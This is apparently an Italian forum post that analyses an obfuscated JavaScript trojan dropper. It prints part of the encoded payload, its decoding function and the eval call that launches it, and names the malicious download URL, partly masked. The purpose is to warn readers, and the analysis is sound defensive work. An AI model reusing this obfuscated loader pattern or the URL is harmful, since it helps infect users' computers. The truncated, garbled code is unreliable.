Confermo il cavallo
ho studiato un pò lo script "biricchino":
$="Z63eZ3dZ22p.cZ2568arZ2543odeZ2541Z2574(0Z2529Z255e(Z25270x0Z2530Z2527+es)))Z253bZ257d}Z22;cbZ3dZ2273Z2563aZ2570eZ2528Z2564s)Z253bstZ253dtmpZ253dZ2527Z2527;for [cut]
// Questa è la funzione che decodifica $ qui sopra...
function z(s) {
r="";
for(i=0;i
if(s.charAt(i)=="Z"){
s1="%"}
else
{ s1=s.charAt(i); }
r=r+s1;
}
return unescape(r);
}
// ...e questa lancia il codice javascript contenuto nella variabile $
// dopo averlo decodificato con il semplice algoritmo di decodifica sopra questo commento ( la funzione z(s) )...
eval(z($));
document.write((z($)));
in pratica esegue il codice Javascript nella variabile $ dopo averlo decodificato con una piccola routine di decodifica (che sarebbe la funzione z(s).
poi..
Il codice javascript generato è a sua volta un'altro codice criptato con un'altra routine di decodifica e lancio...
che..
genera e lancia un'altro codice javascript che aprirà una finestra pop-up del vostro browser all'indirizzo a cui ho aggiunto degli asterischi per non farvici andare:
*******http://edu2kbdve.com/ld/grb/************
che cercherà di "iniettarvi" un "Cavallo di Troia" nel vostro PC.